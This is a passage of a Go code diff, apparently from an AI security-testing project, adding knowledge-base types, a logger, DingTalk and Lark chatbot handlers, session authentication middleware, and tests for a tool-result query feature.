UpdatedAt time.Time `json:"updatedAt"`
|
||||
}
|
||||
|
||||
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
|
||||
func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) {
|
||||
type Alias KnowledgeItemSummary
|
||||
aux := &struct {
|
||||
*Alias
|
||||
CreatedAt string `json:"createdAt"`
|
||||
UpdatedAt string `json:"updatedAt"`
|
||||
}{
|
||||
Alias: (*Alias)(k),
|
||||
}
|
||||
aux.CreatedAt = formatTime(k.CreatedAt)
|
||||
aux.UpdatedAt = formatTime(k.UpdatedAt)
|
||||
return json.Marshal(aux)
|
||||
}
|
||||
|
||||
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
|
||||
func (k *KnowledgeItem) MarshalJSON() ([]byte, error) {
|
||||
type Alias KnowledgeItem
|
||||
aux := &struct {
|
||||
*Alias
|
||||
CreatedAt string `json:"createdAt"`
|
||||
UpdatedAt string `json:"updatedAt"`
|
||||
}{
|
||||
Alias: (*Alias)(k),
|
||||
}
|
||||
aux.CreatedAt = formatTime(k.CreatedAt)
|
||||
aux.UpdatedAt = formatTime(k.UpdatedAt)
|
||||
return json.Marshal(aux)
|
||||
}
|
||||
|
||||
// KnowledgeChunk 知识块(用于向量化)
|
||||
type KnowledgeChunk struct {
|
||||
ID string `json:"id"`
|
||||
ItemID string `json:"itemId"`
|
||||
ChunkIndex int `json:"chunkIndex"`
|
||||
ChunkText string `json:"chunkText"`
|
||||
Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
}
|
||||
|
||||
// RetrievalResult 检索结果
|
||||
type RetrievalResult struct {
|
||||
Chunk *KnowledgeChunk `json:"chunk"`
|
||||
Item *KnowledgeItem `json:"item"`
|
||||
Similarity float64 `json:"similarity"` // 相似度分数
|
||||
Score float64 `json:"score"` // 与 Similarity 相同:余弦相似度
|
||||
}
|
||||
|
||||
// RetrievalLog 检索日志
|
||||
type RetrievalLog struct {
|
||||
ID string `json:"id"`
|
||||
ConversationID string `json:"conversationId,omitempty"`
|
||||
MessageID string `json:"messageId,omitempty"`
|
||||
Query string `json:"query"`
|
||||
RiskType string `json:"riskType,omitempty"`
|
||||
RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表
|
||||
CreatedAt time.Time `json:"createdAt"`
|
||||
}
|
||||
|
||||
// MarshalJSON 自定义 JSON 序列化,确保时间格式正确
|
||||
func (r *RetrievalLog) MarshalJSON() ([]byte, error) {
|
||||
type Alias RetrievalLog
|
||||
return json.Marshal(&struct {
|
||||
*Alias
|
||||
CreatedAt string `json:"createdAt"`
|
||||
}{
|
||||
Alias: (*Alias)(r),
|
||||
CreatedAt: formatTime(r.CreatedAt),
|
||||
})
|
||||
}
|
||||
|
||||
// CategoryWithItems 分类及其下的知识项(用于按分类分页)
|
||||
type CategoryWithItems struct {
|
||||
Category string `json:"category"` // 分类名称
|
||||
ItemCount int `json:"itemCount"` // 该分类下的知识项总数
|
||||
Items []*KnowledgeItemSummary `json:"items"` // 该分类下的知识项列表
|
||||
}
|
||||
|
||||
// SearchRequest 搜索请求
|
||||
type SearchRequest struct {
|
||||
Query string `json:"query"`
|
||||
RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型
|
||||
SubIndexFilter string `json:"subIndexFilter,omitempty"` // 可选:仅保留 sub_indexes 含该标签的行(含未打标旧数据)
|
||||
TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5
|
||||
Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7
|
||||
}
|
||||
@@ -0,0 +1,68 @@
|
||||
package logger
|
||||
|
||||
import (
|
||||
"os"
|
||||
|
||||
"go.uber.org/zap"
|
||||
"go.uber.org/zap/zapcore"
|
||||
)
|
||||
|
||||
type Logger struct {
|
||||
*zap.Logger
|
||||
}
|
||||
|
||||
func New(level, output string) *Logger {
|
||||
var zapLevel zapcore.Level
|
||||
switch level {
|
||||
case "debug":
|
||||
zapLevel = zapcore.DebugLevel
|
||||
case "info":
|
||||
zapLevel = zapcore.InfoLevel
|
||||
case "warn":
|
||||
zapLevel = zapcore.WarnLevel
|
||||
case "error":
|
||||
zapLevel = zapcore.ErrorLevel
|
||||
default:
|
||||
zapLevel = zapcore.InfoLevel
|
||||
}
|
||||
|
||||
config := zap.NewProductionConfig()
|
||||
config.Level = zap.NewAtomicLevelAt(zapLevel)
|
||||
config.EncoderConfig.TimeKey = "timestamp"
|
||||
config.EncoderConfig.EncodeTime = zapcore.ISO8601TimeEncoder
|
||||
|
||||
var writeSyncer zapcore.WriteSyncer
|
||||
if output == "stdout" {
|
||||
writeSyncer = zapcore.AddSync(os.Stdout)
|
||||
} else {
|
||||
file, err := os.OpenFile(output, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
|
||||
if err != nil {
|
||||
writeSyncer = zapcore.AddSync(os.Stdout)
|
||||
} else {
|
||||
writeSyncer = zapcore.AddSync(file)
|
||||
}
|
||||
}
|
||||
|
||||
core := zapcore.NewCore(
|
||||
zapcore.NewJSONEncoder(config.EncoderConfig),
|
||||
writeSyncer,
|
||||
zapLevel,
|
||||
)
|
||||
|
||||
logger := zap.New(core, zap.AddCaller(), zap.AddStacktrace(zapcore.ErrorLevel))
|
||||
|
||||
return &Logger{Logger: logger}
|
||||
}
|
||||
|
||||
func (l *Logger) Fatal(msg string, fields ...interface{}) {
|
||||
zapFields := make([]zap.Field, 0, len(fields))
|
||||
for _, f := range fields {
|
||||
switch v := f.(type) {
|
||||
case error:
|
||||
zapFields = append(zapFields, zap.Error(v))
|
||||
default:
|
||||
zapFields = append(zapFields, zap.Any("field", v))
|
||||
}
|
||||
}
|
||||
l.Logger.Fatal(msg, zapFields...)
|
||||
}
|
||||
@@ -0,0 +1,6 @@
|
||||
package robot
|
||||
|
||||
// MessageHandler 供飞书/钉钉长连接调用的消息处理接口(由 handler.RobotHandler 实现)
|
||||
type MessageHandler interface {
|
||||
HandleMessage(platform, userID, text string) string
|
||||
}
|
||||
+151
@@ -0,0 +1,151 @@
|
||||
package robot
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"github.com/open-dingtalk/dingtalk-stream-sdk-go/chatbot"
|
||||
"github.com/open-dingtalk/dingtalk-stream-sdk-go/client"
|
||||
dingutils "github.com/open-dingtalk/dingtalk-stream-sdk-go/utils"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const (
|
||||
dingReconnectInitial = 5 * time.Second // 首次重连间隔
|
||||
dingReconnectMax = 60 * time.Second // 最大重连间隔
|
||||
)
|
||||
|
||||
// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。
|
||||
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
|
||||
func StartDing(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
|
||||
cfg := robotsCfg.Dingtalk
|
||||
if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" {
|
||||
return
|
||||
}
|
||||
go runDingLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
|
||||
}
|
||||
|
||||
// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。
|
||||
func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
backoff := dingReconnectInitial
|
||||
for {
|
||||
streamClient := client.NewStreamClient(
|
||||
client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)),
|
||||
client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get",
|
||||
chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) {
|
||||
go handleDingMessage(ctx, msg, cfg, strictUserIdentity, h, logger)
|
||||
return nil, nil
|
||||
}).OnEventReceived),
|
||||
)
|
||||
logger.Info("钉钉 Stream 正在连接…", zap.String("client_id", cfg.ClientID))
|
||||
err := streamClient.Start(ctx)
|
||||
if ctx.Err() != nil {
|
||||
logger.Info("钉钉 Stream 已按配置重启关闭")
|
||||
return
|
||||
}
|
||||
if err != nil {
|
||||
logger.Warn("钉钉 Stream 长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
|
||||
}
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-time.After(backoff):
|
||||
// 下次重连间隔递增,上限 60 秒,避免频繁重试
|
||||
if backoff < dingReconnectMax {
|
||||
backoff *= 2
|
||||
if backoff > dingReconnectMax {
|
||||
backoff = dingReconnectMax
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
if msg == nil || msg.SessionWebhook == "" {
|
||||
return
|
||||
}
|
||||
content := ""
|
||||
if msg.Text.Content != "" {
|
||||
content = strings.TrimSpace(msg.Text.Content)
|
||||
}
|
||||
if content == "" && msg.Msgtype == "richText" {
|
||||
if cMap, ok := msg.Content.(map[string]interface{}); ok {
|
||||
if rich, ok := cMap["richText"].([]interface{}); ok {
|
||||
for _, c := range rich {
|
||||
if m, ok := c.(map[string]interface{}); ok {
|
||||
if txt, ok := m["text"].(string); ok {
|
||||
content = strings.TrimSpace(txt)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if content == "" {
|
||||
logger.Debug("钉钉消息内容为空,已忽略", zap.String("msgtype", msg.Msgtype))
|
||||
return
|
||||
}
|
||||
logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content))
|
||||
tenantKey := strings.TrimSpace(cfg.ClientID)
|
||||
if tenantKey == "" {
|
||||
tenantKey = "default"
|
||||
}
|
||||
userID := strings.TrimSpace(msg.SenderId)
|
||||
if userID != "" {
|
||||
userID = "t:" + tenantKey + "|u:" + userID
|
||||
} else if cfg.AllowConversationIDFallback && !strictUserIdentity {
|
||||
conversationID := strings.TrimSpace(msg.ConversationId)
|
||||
if conversationID != "" {
|
||||
userID = "t:" + tenantKey + "|c:" + conversationID
|
||||
}
|
||||
}
|
||||
if userID == "" {
|
||||
logger.Warn("钉钉消息缺少可用用户标识,已忽略")
|
||||
return
|
||||
}
|
||||
reply := h.HandleMessage("dingtalk", userID, content)
|
||||
// 使用 markdown 类型以便正确展示标题、列表、代码块等格式
|
||||
title := reply
|
||||
if idx := strings.IndexAny(reply, "\n"); idx > 0 {
|
||||
title = strings.TrimSpace(reply[:idx])
|
||||
}
|
||||
if len(title) > 50 {
|
||||
title = title[:50] + "…"
|
||||
}
|
||||
if title == "" {
|
||||
title = "回复"
|
||||
}
|
||||
body := map[string]interface{}{
|
||||
"msgtype": "markdown",
|
||||
"markdown": map[string]string{
|
||||
"title": title,
|
||||
"text": reply,
|
||||
},
|
||||
}
|
||||
bodyBytes, _ := json.Marshal(body)
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodPost, msg.SessionWebhook, bytes.NewReader(bodyBytes))
|
||||
if err != nil {
|
||||
logger.Warn("钉钉构造回复请求失败", zap.Error(err))
|
||||
return
|
||||
}
|
||||
req.Header.Set("Content-Type", "application/json")
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil {
|
||||
logger.Warn("钉钉回复请求失败", zap.Error(err))
|
||||
return
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
logger.Warn("钉钉回复非 200", zap.Int("status", resp.StatusCode))
|
||||
return
|
||||
}
|
||||
logger.Debug("钉钉回复成功", zap.String("content_preview", reply))
|
||||
}
|
||||
+141
@@ -0,0 +1,141 @@
|
||||
package robot
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
lark "github.com/larksuite/oapi-sdk-go/v3"
|
||||
larkcore "github.com/larksuite/oapi-sdk-go/v3/core"
|
||||
"github.com/larksuite/oapi-sdk-go/v3/event/dispatcher"
|
||||
larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1"
|
||||
larkws "github.com/larksuite/oapi-sdk-go/v3/ws"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
const (
|
||||
larkReconnectInitial = 5 * time.Second // 首次重连间隔
|
||||
larkReconnectMax = 60 * time.Second // 最大重连间隔
|
||||
)
|
||||
|
||||
type larkTextContent struct {
|
||||
Text string `json:"text"`
|
||||
}
|
||||
|
||||
// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。
|
||||
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
|
||||
func StartLark(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) {
|
||||
cfg := robotsCfg.Lark
|
||||
if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" {
|
||||
return
|
||||
}
|
||||
go runLarkLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger)
|
||||
}
|
||||
|
||||
// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。
|
||||
func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) {
|
||||
backoff := larkReconnectInitial
|
||||
for {
|
||||
larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret)
|
||||
eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error {
|
||||
go handleLarkMessage(ctx, event, cfg, strictUserIdentity, h, larkClient, logger)
|
||||
return nil
|
||||
})
|
||||
wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret,
|
||||
larkws.WithEventHandler(eventHandler),
|
||||
larkws.WithLogLevel(larkcore.LogLevelInfo),
|
||||
)
|
||||
logger.Info("飞书长连接正在连接…", zap.String("app_id", cfg.AppID))
|
||||
err := wsClient.Start(ctx)
|
||||
if ctx.Err() != nil {
|
||||
logger.Info("飞书长连接已按配置重启关闭")
|
||||
return
|
||||
}
|
||||
if err != nil {
|
||||
logger.Warn("飞书长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
|
||||
}
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-time.After(backoff):
|
||||
if backoff < larkReconnectMax {
|
||||
backoff *= 2
|
||||
if backoff > larkReconnectMax {
|
||||
backoff = larkReconnectMax
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, client *lark.Client, logger *zap.Logger) {
|
||||
if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
|
||||
return
|
||||
}
|
||||
msg := event.Event.Message
|
||||
msgType := larkcore.StringValue(msg.MessageType)
|
||||
if msgType != larkim.MsgTypeText {
|
||||
logger.Debug("飞书暂仅处理文本消息", zap.String("msg_type", msgType))
|
||||
return
|
||||
}
|
||||
var textBody larkTextContent
|
||||
if err := json.Unmarshal([]byte(larkcore.StringValue(msg.Content)), &textBody); err != nil {
|
||||
logger.Warn("飞书消息 Content 解析失败", zap.Error(err))
|
||||
return
|
||||
}
|
||||
text := strings.TrimSpace(textBody.Text)
|
||||
if text == "" {
|
||||
return
|
||||
}
|
||||
userID := resolveLarkUserID(event, cfg.AllowChatIDFallback && !strictUserIdentity)
|
||||
if userID == "" {
|
||||
logger.Warn("飞书消息缺少可用用户标识,已忽略")
|
||||
return
|
||||
}
|
||||
messageID := larkcore.StringValue(msg.MessageId)
|
||||
reply := h.HandleMessage("lark", userID, text)
|
||||
contentBytes, _ := json.Marshal(larkTextContent{Text: reply})
|
||||
_, err := client.Im.Message.Reply(ctx, larkim.NewReplyMessageReqBuilder().
|
||||
MessageId(messageID).
|
||||
Body(larkim.NewReplyMessageReqBodyBuilder().
|
||||
MsgType(larkim.MsgTypeText).
|
||||
Content(string(contentBytes)).
|
||||
Build()).
|
||||
Build())
|
||||
if err != nil {
|
||||
logger.Warn("飞书回复失败", zap.String("message_id", messageID), zap.Error(err))
|
||||
return
|
||||
}
|
||||
logger.Debug("飞书已回复", zap.String("message_id", messageID))
|
||||
}
|
||||
|
||||
// resolveLarkUserID 提取飞书会话隔离键:
|
||||
// tenant_key + 稳定用户标识(user_id/open_id/union_id);按配置可选 chat_id 兜底。
|
||||
func resolveLarkUserID(event *larkim.P2MessageReceiveV1, allowChatIDFallback bool) string {
|
||||
if event == nil || event.Event == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil {
|
||||
return ""
|
||||
}
|
||||
tenantKey := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.TenantKey))
|
||||
if tenantKey == "" {
|
||||
tenantKey = "default"
|
||||
}
|
||||
prefix := "t:" + tenantKey + "|"
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UserId)); id != "" {
|
||||
return prefix + "u:" + id
|
||||
}
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.OpenId)); id != "" {
|
||||
return prefix + "o:" + id
|
||||
}
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UnionId)); id != "" {
|
||||
return prefix + "n:" + id
|
||||
}
|
||||
if allowChatIDFallback && event.Event.Message != nil {
|
||||
if id := strings.TrimSpace(larkcore.StringValue(event.Event.Message.ChatId)); id != "" {
|
||||
return prefix + "c:" + id
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
@@ -0,0 +1,132 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/google/uuid"
|
||||
)
|
||||
|
||||
// Predefined errors for authentication operations.
|
||||
var (
|
||||
ErrInvalidPassword = errors.New("invalid password")
|
||||
)
|
||||
|
||||
// Session represents an authenticated user session.
|
||||
type Session struct {
|
||||
Token string
|
||||
ExpiresAt time.Time
|
||||
}
|
||||
|
||||
// AuthManager manages password-based authentication and session lifecycle.
|
||||
type AuthManager struct {
|
||||
password string
|
||||
sessionDuration time.Duration
|
||||
|
||||
mu sync.RWMutex
|
||||
sessions map[string]Session
|
||||
}
|
||||
|
||||
// NewAuthManager creates a new AuthManager instance.
|
||||
func NewAuthManager(password string, sessionDurationHours int) (*AuthManager, error) {
|
||||
if strings.TrimSpace(password) == "" {
|
||||
return nil, errors.New("auth password must be configured")
|
||||
}
|
||||
|
||||
if sessionDurationHours <= 0 {
|
||||
sessionDurationHours = 12
|
||||
}
|
||||
|
||||
return &AuthManager{
|
||||
password: password,
|
||||
sessionDuration: time.Duration(sessionDurationHours) * time.Hour,
|
||||
sessions: make(map[string]Session),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Authenticate validates the password and creates a new session.
|
||||
func (a *AuthManager) Authenticate(password string) (string, time.Time, error) {
|
||||
if password != a.password {
|
||||
return "", time.Time{}, ErrInvalidPassword
|
||||
}
|
||||
|
||||
token := uuid.NewString()
|
||||
expiresAt := time.Now().Add(a.sessionDuration)
|
||||
|
||||
a.mu.Lock()
|
||||
a.sessions[token] = Session{
|
||||
Token: token,
|
||||
ExpiresAt: expiresAt,
|
||||
}
|
||||
a.mu.Unlock()
|
||||
|
||||
return token, expiresAt, nil
|
||||
}
|
||||
|
||||
// ValidateToken checks whether the provided token is still valid.
|
||||
func (a *AuthManager) ValidateToken(token string) (Session, bool) {
|
||||
if strings.TrimSpace(token) == "" {
|
||||
return Session{}, false
|
||||
}
|
||||
|
||||
a.mu.RLock()
|
||||
session, ok := a.sessions[token]
|
||||
a.mu.RUnlock()
|
||||
if !ok {
|
||||
return Session{}, false
|
||||
}
|
||||
|
||||
if time.Now().After(session.ExpiresAt) {
|
||||
a.mu.Lock()
|
||||
delete(a.sessions, token)
|
||||
a.mu.Unlock()
|
||||
return Session{}, false
|
||||
}
|
||||
|
||||
return session, true
|
||||
}
|
||||
|
||||
// CheckPassword verifies whether the provided password matches the current password.
|
||||
func (a *AuthManager) CheckPassword(password string) bool {
|
||||
a.mu.RLock()
|
||||
defer a.mu.RUnlock()
|
||||
return password == a.password
|
||||
}
|
||||
|
||||
// RevokeToken invalidates the specified token.
|
||||
func (a *AuthManager) RevokeToken(token string) {
|
||||
if strings.TrimSpace(token) == "" {
|
||||
return
|
||||
}
|
||||
|
||||
a.mu.Lock()
|
||||
delete(a.sessions, token)
|
||||
a.mu.Unlock()
|
||||
}
|
||||
|
||||
// SessionDurationHours returns the configured session duration in hours.
|
||||
func (a *AuthManager) SessionDurationHours() int {
|
||||
return int(a.sessionDuration / time.Hour)
|
||||
}
|
||||
|
||||
// UpdateConfig updates the password and session duration, revoking existing sessions.
|
||||
func (a *AuthManager) UpdateConfig(password string, sessionDurationHours int) error {
|
||||
password = strings.TrimSpace(password)
|
||||
if password == "" {
|
||||
return errors.New("auth password must be configured")
|
||||
}
|
||||
|
||||
if sessionDurationHours <= 0 {
|
||||
sessionDurationHours = 12
|
||||
}
|
||||
|
||||
a.mu.Lock()
|
||||
defer a.mu.Unlock()
|
||||
|
||||
a.password = password
|
||||
a.sessionDuration = time.Duration(sessionDurationHours) * time.Hour
|
||||
a.sessions = make(map[string]Session)
|
||||
return nil
|
||||
}
|
||||
@@ -0,0 +1,51 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"strings"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
const (
|
||||
ContextAuthTokenKey = "authToken"
|
||||
ContextSessionExpiry = "authSessionExpiry"
|
||||
)
|
||||
|
||||
// AuthMiddleware enforces authentication on protected routes.
|
||||
func AuthMiddleware(manager *AuthManager) gin.HandlerFunc {
|
||||
return func(c *gin.Context) {
|
||||
token := extractTokenFromRequest(c)
|
||||
session, ok := manager.ValidateToken(token)
|
||||
if !ok {
|
||||
c.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{
|
||||
"error": "未授权访问,请先登录",
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
c.Set(ContextAuthTokenKey, session.Token)
|
||||
c.Set(ContextSessionExpiry, session.ExpiresAt)
|
||||
c.Next()
|
||||
}
|
||||
}
|
||||
|
||||
func extractTokenFromRequest(c *gin.Context) string {
|
||||
authHeader := c.GetHeader("Authorization")
|
||||
if authHeader != "" {
|
||||
if len(authHeader) > 7 && strings.EqualFold(authHeader[0:7], "Bearer ") {
|
||||
return strings.TrimSpace(authHeader[7:])
|
||||
}
|
||||
return strings.TrimSpace(authHeader)
|
||||
}
|
||||
|
||||
if token := c.Query("token"); token != "" {
|
||||
return strings.TrimSpace(token)
|
||||
}
|
||||
|
||||
if cookie, err := c.Cookie("auth_token"); err == nil {
|
||||
return strings.TrimSpace(cookie)
|
||||
}
|
||||
|
||||
return ""
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,290 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"context"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/storage"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// setupTestExecutor 创建测试用的执行器
|
||||
func setupTestExecutor(t *testing.T) (*Executor, *mcp.Server) {
|
||||
logger := zap.NewNop()
|
||||
mcpServer := mcp.NewServer(logger)
|
||||
|
||||
cfg := &config.SecurityConfig{
|
||||
Tools: []config.ToolConfig{},
|
||||
}
|
||||
|
||||
executor := NewExecutor(cfg, mcpServer, logger)
|
||||
return executor, mcpServer
|
||||
}
|
||||
|
||||
// setupTestStorage 创建测试用的存储
|
||||
func setupTestStorage(t *testing.T) *storage.FileResultStorage {
|
||||
tmpDir := filepath.Join(os.TempDir(), "test_executor_storage_"+time.Now().Format("20060102_150405"))
|
||||
logger := zap.NewNop()
|
||||
|
||||
storage, err := storage.NewFileResultStorage(tmpDir, logger)
|
||||
if err != nil {
|
||||
t.Fatalf("创建测试存储失败: %v", err)
|
||||
}
|
||||
|
||||
return storage
|
||||
}
|
||||
|
||||
func TestExecutor_ExecuteInternalTool_QueryExecutionResult(t *testing.T) {
|
||||
executor, _ := setupTestExecutor(t)
|
||||
testStorage := setupTestStorage(t)
|
||||
executor.SetResultStorage(testStorage)
|
||||
|
||||
// 准备测试数据
|
||||
executionID := "test_exec_001"
|
||||
toolName := "nmap_scan"
|
||||
result := "Line 1: Port 22 open\nLine 2: Port 80 open\nLine 3: Port 443 open\nLine 4: error occurred"
|
||||
|
||||
// 保存测试结果
|
||||
err := testStorage.SaveResult(executionID, toolName, result)
|
||||
if err != nil {
|
||||
t.Fatalf("保存测试结果失败: %v", err)
|
||||
}
|
||||
|
||||
ctx := context.Background()
|
||||
|
||||
// 测试1: 基本查询(第一页)
|
||||
args := map[string]interface{}{
|
||||
"execution_id": executionID,
|
||||
"page": float64(1),
|
||||
"limit": float64(2),
|
||||
}
|
||||
|
||||
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
|
||||
if err != nil {
|
||||
t.Fatalf("执行查询失败: %v", err)
|
||||
}
|
||||
|
||||
if toolResult.IsError {
|
||||
t.Fatalf("查询应该成功,但返回了错误: %s", toolResult.Content[0].Text)
|
||||
}
|
||||
|
||||
// 验证结果包含预期内容
|
||||
resultText := toolResult.Content[0].Text
|
||||
if !strings.Contains(resultText, executionID) {
|
||||
t.Errorf("结果中应该包含执行ID: %s", executionID)
|
||||
}
|
||||
|
||||
if !strings.Contains(resultText, "第 1/") {
|
||||
t.Errorf("结果中应该包含分页信息")
|
||||
}
|
||||
|
||||
// 测试2: 搜索功能
|
||||
args2 := map[string]interface{}{
|
||||
"execution_id": executionID,
|
||||
"search": "error",
|
||||
"page": float64(1),
|
||||
"limit": float64(10),
|
||||
}
|
||||
|
||||
toolResult2, err := executor.executeQueryExecutionResult(ctx, args2)
|
||||
if err != nil {
|
||||
t.Fatalf("执行搜索失败: %v", err)
|
||||
}
|
||||
|
||||
if toolResult2.IsError {
|
||||
t.Fatalf("搜索应该成功,但返回了错误: %s", toolResult2.Content[0].Text)
|
||||
}
|
||||
|
||||
resultText2 := toolResult2.Content[0].Text
|
||||
if !strings.Contains(resultText2, "error") {
|
||||
t.Errorf("搜索结果中应该包含关键词: error")
|
||||
}
|
||||
|
||||
// 测试3: 过滤功能
|
||||
args3 := map[string]interface{}{
|
||||
"execution_id": executionID,
|
||||
"filter": "Port",
|
||||
"page": float64(1),
|
||||
"limit": float64(10),
|
||||
}
|
||||
|
||||
toolResult3, err := executor.executeQueryExecutionResult(ctx, args3)
|
||||
if err != nil {
|
||||
t.Fatalf("执行过滤失败: %v", err)
|
||||
}
|
||||
|
||||
if toolResult3.IsError {
|
||||
t.Fatalf("过滤应该成功,但返回了错误: %s", toolResult3.Content[0].Text)
|
||||
}
|
||||
|
||||
resultText3 := toolResult3.Content[0].Text
|
||||
if !strings.Contains(resultText3, "Port") {
|
||||
t.Errorf("过滤结果中应该包含关键词: Port")
|
||||
}
|
||||
|
||||
// 测试4: 缺少必需参数
|
||||
args4 := map[string]interface{}{
|
||||
"page": float64(1),
|
||||
}
|
||||
|
||||
toolResult4, err := executor.executeQueryExecutionResult(ctx, args4)
|
||||
if err != nil {
|
||||
t.Fatalf("执行查询失败: %v", err)
|
||||
}
|
||||
|
||||
if !toolResult4.IsError {
|
||||
t.Fatal("缺少execution_id应该返回错误")
|
||||
}
|
||||
|
||||
// 测试5: 不存在的执行ID
|
||||
args5 := map[string]interface{}{
|
||||
"execution_id": "nonexistent_id",
|
||||
"page": float64(1),
|
||||
}
|
||||
|
||||
toolResult5, err := executor.executeQueryExecutionResult(ctx, args5)
|
||||
if err != nil {
|
||||
t.Fatalf("执行查询失败: %v", err)
|
||||
}
|
||||
|
||||
if !toolResult5.IsError {
|
||||
t.Fatal("不存在的执行ID应该返回错误")
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) {
|
||||
executor, _ := setupTestExecutor(t)
|
||||
|
||||
ctx := context.Background()
|
||||
args := map[string]interface{}{
|
||||
"test": "value",
|
||||
}
|
||||
|
||||
// 测试未知的内部工具类型
|
||||
toolResult, err := executor.executeInternalTool(ctx, "unknown_tool", "internal:unknown_tool", args)
|
||||
if err != nil {
|
||||
t.Fatalf("执行内部工具失败: %v", err)
|
||||
}
|
||||
|
||||
if !toolResult.IsError {
|
||||
t.Fatal("未知的工具类型应该返回错误")
|
||||
}
|
||||
|
||||
if !strings.Contains(toolResult.Content[0].Text, "未知的内部工具类型") {
|
||||
t.Errorf("错误消息应该包含'未知的内部工具类型'")
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) {
|
||||
executor, _ := setupTestExecutor(t)
|
||||
// 不设置存储,测试未初始化的情况
|
||||
|
||||
